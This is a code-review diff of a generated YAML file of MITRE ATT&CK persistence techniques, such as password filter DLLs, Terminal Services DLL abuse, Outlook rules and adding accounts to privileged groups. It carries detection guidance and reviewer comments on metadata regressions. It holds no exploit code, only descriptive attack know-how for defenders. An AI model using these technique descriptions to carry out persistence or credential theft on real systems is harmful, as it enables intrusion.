+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -29942,71 +30287,60 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1505.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
- created: '2022-03-28T15:34:44.590Z'
- x_mitre_version: '1.0'
- external_references:
- - source_name: mitre-attack
- external_id: T1505.005
- url: https://attack.mitre.org/techniques/T1505/005
- - source_name: James TermServ DLL
- url: https://twitter.com/james_inthe_box/status/1150495335812177920
- description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
- 2022.
- - source_name: Microsoft System Services Fundamentals
- url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
- description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
- Retrieved March 28, 2022.
- - source_name: Microsoft Remote Desktop Services
- url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
- description: Microsoft. (2019, August 23). About Remote Desktop Services.
- Retrieved March 28, 2022.
- - source_name: RDPWrap Github
- url: https://github.com/stascorp/rdpwrap
- description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
- Retrieved March 28, 2022.
- - source_name: Windows OS Hub RDP
- url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
- description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
- Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:42.810Z'
+ name: 'Server Software Component: Terminal Services DLL'
description: |-
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe
) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll
.(Citation: Microsoft System Services Fundamentals) The termsrv.dll
file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll
value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll
functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll
file or modifying the ServiceDll
value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Server Software Component: Terminal Services DLL'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for changes to Registry keys associated with ServiceDll
and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\
.
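Review bot: the regenerated T1556.002 object drops `x_mitre_permissions_required` (`Administrator`, `SYSTEM`) without a replacement while bumping `x_mitre_version` from '2.0' to '2.1' and the spec version from 2.1.0 to 3.2.0; the detection text is unchanged. Anything that filters or indexes techniques by required permission will silently lose this entry, so check consumers of that key before merging (the same removal happens to T1137.005 later in this diff, which loses `Administrator`/`User`).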
@@ -30015,24 +30349,56 @@ persistence:
Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe
) or modify/replace the legitimate termsrv.dll
.
Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs
) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll
, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Command: Command Execution'
- 'File: File Modification'
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+ created: '2022-03-28T15:34:44.590Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/005
+ external_id: T1505.005
+ - source_name: James TermServ DLL
+ description: James. (2019, July 14). @James_inthe_box. Retrieved September
+ 12, 2024.
+ url: https://x.com/james_inthe_box/status/1150495335812177920
+ - source_name: Microsoft System Services Fundamentals
+ description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+ Retrieved March 28, 2022.
+ url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+ - source_name: Microsoft Remote Desktop Services
+ description: Microsoft. (2019, August 23). About Remote Desktop Services.
+ Retrieved March 28, 2022.
+ url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+ - source_name: RDPWrap Github
+ description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+ Retrieved March 28, 2022.
+ url: https://github.com/stascorp/rdpwrap
+ - source_name: Windows OS Hub RDP
+ description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+ Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+ url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.005
atomic_tests: []
T1176:
technique:
- modified: '2024-04-18T23:22:37.874Z'
+ modified: '2024-09-12T19:48:15.871Z'
name: Browser Extensions
description: "Adversaries may abuse Internet browser extensions to establish
persistent access to victim systems. Browser extensions or plugins are small
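Review bot: the `James TermServ DLL` reference for T1505.005 now points at x.com instead of twitter.com with the retrieved date updated to September 12, 2024, while the other four references keep their March 28, 2022 dates, which is consistent with only that link having been re-verified. Posts there are frequently not viewable without a login, so an archived copy (as the T1176 reference in this same diff uses via web.archive.org) would make the citation more durable; that is an upstream fix rather than something to hand-edit in this generated file.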
@@ -30124,8 +30490,8 @@ persistence:
url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
- source_name: Chrome Extension C2 Malware
description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
- get hacked by a Chrome extension. Retrieved November 22, 2017.'
- url: https://kjaer.io/extension-malware/
+ get hacked by a Chrome extension. Retrieved September 12, 2024.'
+ url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
- source_name: Catch All Chrome Extension
description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
Steals All Posted Data. Retrieved November 16, 2017.
@@ -30156,71 +30522,139 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1176
atomic_tests: []
T1137.005:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:02:26.206Z'
+ name: Outlook Rules
+ description: |-
+ Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+ Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Microsoft Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Application Log: Application Log Content'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
created: '2019-11-07T20:00:25.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137.005
url: https://attack.mitre.org/techniques/T1137/005
- - source_name: SilentBreak Outlook Rules
- url: https://silentbreaksecurity.com/malicious-outlook-rules/
- description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
- February 4, 2019.
+ external_id: T1137.005
+ - source_name: Pfammatter - Hidden Inbox Rules
+ description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+ Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- source_name: Microsoft Detect Outlook Forms
- url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
4, 2019.
- - source_name: Pfammatter - Hidden Inbox Rules
- url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
- description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
- Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+ - source_name: SilentBreak Outlook Rules
+ description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
+ February 4, 2019.
+ url: https://silentbreaksecurity.com/malicious-outlook-rules/
- source_name: SensePost NotRuler
- url: https://github.com/sensepost/notruler
description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
provides blue teams with the ability to detect Ruler usage against Exchange.
Retrieved February 4, 2019.
- modified: '2022-04-25T14:00:00.188Z'
- name: Outlook Rules
- description: |-
- Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
-
- Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ url: https://github.com/sensepost/notruler
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1098.007:
+ technique:
+ modified: '2024-10-14T14:32:08.926Z'
+ name: Additional Local or Domain Groups
+ description: "An adversary may add additional local or domain groups to an adversary-controlled
+ account to maintain persistent access to a system or domain.\n\nOn Windows,
+ accounts may use the `net localgroup` and `net group` commands to add existing
+ users to local and domain groups.(Citation: Microsoft Net Localgroup)(Citation:
+ Microsoft Net Group) On Linux, adversaries may use the `usermod` command for
+ the same purpose.(Citation: Linux Usermod)\n\nFor example, accounts may be
+ added to the local administrators group on Windows devices to maintain elevated
+ privileges. They may also be added to the Remote Desktop Users group, which
+ allows them to leverage [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001)
+ to log into the endpoints in the future.(Citation: Microsoft RDP Logons) On
+ Linux, accounts may be added to the sudoers group, allowing them to persistently
+ leverage [Sudo and Sudo Caching](https://attack.mitre.org/techniques/T1548/003)
+ for elevated privileges. \n\nIn Windows environments, machine accounts may
+ also be added to domain groups. This allows the local SYSTEM account to gain
+ privileges on the domain.(Citation: RootDSE AD Detection 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
- x_mitre_detection: |-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
-
- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ - kill_chain_name: mitre-attack
+ phase_name: privilege-escalation
+ x_mitre_contributors:
+ - Madhukar Raina (Senior Security Researcher - Hack The Box, UK)
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- - 'Process: Process Creation'
- - 'Application Log: Application Log Content'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ - 'User Account: User Account Modification'
+ type: attack-pattern
+ id: attack-pattern--3e6831b2-bf4c-4ae6-b328-2e7c6633b291
+ created: '2024-08-05T20:49:49.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1098/007
+ external_id: T1098.007
+ - source_name: Linux Usermod
+ description: Man7. (n.d.). Usermod. Retrieved August 5, 2024.
+ url: https://www.man7.org/linux/man-pages/man8/usermod.8.html
+ - source_name: Microsoft Net Group
+ description: Microsoft. (2016, August 31). Net group. Retrieved August 5,
+ 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc754051(v=ws.11)
+ - source_name: Microsoft Net Localgroup
+ description: Microsoft. (2016, August 31). Net Localgroup. Retrieved August
+ 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc725622(v=ws.11)
+ - source_name: Microsoft RDP Logons
+ description: Microsoft. (2017, April 9). Allow log on through Remote Desktop
+ Services. Retrieved August 5, 2024.
+ url: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/allow-log-on-through-remote-desktop-services
+ - source_name: RootDSE AD Detection 2022
+ description: Scarred Monk. (2022, May 6). Real-time detection scenarios in
+ Active Directory environments. Retrieved August 5, 2024.
+ url: https://rootdse.org/posts/monitoring-realtime-activedirectory-domain-scenarios
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1546.011:
technique:
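Review bot: git has aligned the old T1137.005 lines `kill_chain_phases:` / `phase_name: persistence`, `x_mitre_is_subtechnique: true`, `x_mitre_data_sources:` and the closing `atomic_tests: []` with the newly added T1098.007 object, so the hunk reads as if T1098.007 were spliced into the middle of T1137.005; review the rendered YAML (T1137.005 should end at its own `atomic_tests: []` immediately after its `x_mitre_modified_by_ref`) rather than the hunk. Two things to confirm there: the new T1098.007 entry has no `identifier:` key (neither does T1137.005, while T1556.002, T1505.005 and T1176 above carry one), and its `x_mitre_detection` is the empty string, so anything that renders detection guidance from this file needs to tolerate an empty value. The platform rename `Office 365` to `Office Suite` for T1137.005 also belongs to this hunk and affects any per-platform index keyed on the old name.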
@@ -30251,7 +30685,7 @@ persistence:
description: Pierce, Sean. (2015, November). Defending Against Malicious Application
Compatibility Shims. Retrieved June 22, 2017.
source_name: Black Hat 2015 App Shim
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.094Z'
name: 'Event Triggered Execution: Application Shimming'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by application shims. The Microsoft
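Review bot: `modified` for T1546.011 moves backwards here, from 2022-04-25 to 2020-11-10, which cannot be a newer upstream revision of the same object. The same regression appears later in this diff for T1037.002 (2022-05-11 to 2022-04-20), T1205 (2022-11-08 to 2022-10-19), T1525 (2022-05-11 to 2022-03-08), T1547.005 (2021-04-29 to 2020-03-25) and T1543.004 (2023-05-09 to 2023-03-30), and every object in the diff loses its `spec_version: '2.1'` line, which looks like the generator switched from a STIX 2.1 bundle to a STIX 2.0 one rather than pulling a newer release. Confirm which upstream source was intended, and if the switch is deliberate, state it in the PR description so the backwards timestamps are not mistaken for a regression.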
@@ -30306,13 +30740,11 @@ persistence:
- 'Process: Process Creation'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1546.011
atomic_tests: []
T1547.010:
technique:
- modified: '2024-04-12T02:49:39.980Z'
+ modified: '2024-09-12T15:26:17.886Z'
name: 'Boot or Logon Autostart Execution: Port Monitors'
description: "Adversaries may use port monitors to run an adversary supplied
DLL during system boot for persistence or privilege escalation. A port monitor
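Review bot: after this hunk T1546.011 has neither `spec_version` nor `x_mitre_attack_spec_version` (both removed, nothing added), unlike T1547.009 and T1556.007 in this diff, which get `x_mitre_attack_spec_version: 3.2.0` in place of the removed 2.1.0; T1525 and T1547.005 are left the same way further down. If any tooling reads `x_mitre_attack_spec_version` to decide how to interpret an object, it needs a default for these objects. The `x_mitre_permissions_required: - Administrator` that survives as context here is also the older field shape that the 3.2.0 objects in this diff no longer carry.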
@@ -30373,9 +30805,9 @@ persistence:
slides]. Retrieved November 12, 2014.
url: https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
- source_name: AddMonitor
- description: Microsoft. (n.d.). AddMonitor function. Retrieved November 12,
- 2014.
- url: http://msdn.microsoft.com/en-us/library/dd183341
+ description: Microsoft. (n.d.). AddMonitor function. Retrieved September 12,
+ 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/printdocs/addmonitor
- source_name: TechNet Autoruns
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
@@ -30384,7 +30816,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.010
atomic_tests: []
T1037.002:
@@ -30437,7 +30868,7 @@ persistence:
Wardle Persistence Chapter)\n\n**Note:** Login hooks were deprecated in 10.11
version of macOS in favor of [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)
and [Launch Agent](https://attack.mitre.org/techniques/T1543/001) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:42:05.094Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Logon Script (Mac)'
x_mitre_detection: Monitor logon scripts for unusual access by abnormal users
@@ -30458,12 +30889,11 @@ persistence:
- 'Command: Command Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.002
atomic_tests: []
T1205:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T23:08:40.603Z'
name: Traffic Signaling
description: |-
Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -30547,11 +30977,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T13:41:16.110Z'
name: 'Boot or Logon Autostart Execution: Shortcut Modification'
description: |-
Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
@@ -30564,7 +30993,6 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- David French, Elastic
- Bobby, Filar, Elastic
@@ -30577,7 +31005,6 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.2'
@@ -30607,7 +31034,8 @@ persistence:
url: https://www.youtube.com/watch?v=nJ0UsyiUEqQ
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1547.009
atomic_tests: []
T1525:
@@ -30639,7 +31067,7 @@ persistence:
url: https://github.com/RhinoSecurityLabs/ccat
description: Rhino Labs. (2019, September). Cloud Container Attack Tool (CCAT).
Retrieved September 12, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T21:27:49.094Z'
name: Implant Internal Image
description: |-
Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
@@ -30661,8 +31089,6 @@ persistence:
x_mitre_permissions_required:
- User
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.005:
technique:
@@ -30688,7 +31114,7 @@ persistence:
description: Microsoft. (2013, July 31). Configuring Additional LSA Protection.
Retrieved June 24, 2015.
source_name: Microsoft Configure LSA
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-25T15:42:48.910Z'
name: 'Boot or Logon Autostart Execution: Security Support Provider'
description: |-
Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.
@@ -30714,36 +31140,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1547.005
atomic_tests: []
T1556.007:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Hybrid Identity
description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
processes that are tied to on-premises user identities in order to bypass
typical authentication mechanisms, access credentials, and enable persistent
access to accounts. \n\nMany organizations maintain hybrid user and device
identities that are shared between on-premises and cloud-based environments.
- These can be maintained in a number of ways. For example, Azure AD includes
- three options for synchronizing identities between Active Directory and Azure
- AD(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
+ These can be maintained in a number of ways. For example, Microsoft Entra
+ ID includes three options for synchronizing identities between Active Directory
+ and Entra ID(Citation: Azure AD Hybrid Identity):\n\n* Password Hash Synchronization
(PHS), in which a privileged on-premises account synchronizes user password
- hashes between Active Directory and Azure AD, allowing authentication to Azure
- AD to take place entirely in the cloud \n* Pass Through Authentication (PTA),
- in which Azure AD authentication attempts are forwarded to an on-premises
+ hashes between Active Directory and Entra ID, allowing authentication to Entra
+ ID to take place entirely in the cloud \n* Pass Through Authentication (PTA),
+ in which Entra ID authentication attempts are forwarded to an on-premises
PTA agent, which validates the credentials against Active Directory \n* Active
Directory Federation Services (AD FS), in which a trust relationship is established
- between Active Directory and Azure AD \n\nAD FS can also be used with other
+ between Active Directory and Entra ID \n\nAD FS can also be used with other
SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication
process to AD FS and receive a token containing the hybrid users’ identity
and privileges. \n\nBy modifying authentication processes tied to hybrid identities,
an adversary may be able to establish persistent privileged access to cloud
resources. For example, adversaries who compromise an on-premises server running
a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService`
- process that authorizes all attempts to authenticate to Azure AD, as well
+ process that authorizes all attempts to authenticate to Entra ID, as well
as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation:
